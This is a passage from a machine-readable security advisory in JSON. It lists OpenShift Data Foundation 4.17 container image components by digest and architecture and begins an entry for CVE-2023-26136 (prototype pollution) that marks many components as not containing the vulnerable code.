"product_reference": "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x"
},
"product_reference": "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64"
},
"product_reference": "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le"
},
"product_reference": "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64"
},
"product_reference": "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x"
},
"product_reference": "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le"
},
"product_reference": "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x"
},
"product_reference": "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le"
},
"product_reference": "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64"
},
"product_reference": "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le"
},
"product_reference": "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x"
},
"product_reference": "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64"
},
"product_reference": "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64"
},
"product_reference": "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le"
},
"product_reference": "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x"
},
"product_reference": "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64"
},
"product_reference": "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x"
},
"product_reference": "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le"
},
"product_reference": "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64"
},
"product_reference": "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le"
},
"product_reference": "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
},
"product_reference": "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
}
]
},
"vulnerabilities": [
{
"acknowledgments": [
{
"names": [
"Kokorin Vsevolod"
]
}
],
"cve": "CVE-2023-26136",
"cwe": {
"id": "CWE-1321",
"name": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)"
},
"discovery_date": "2023-07-03T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
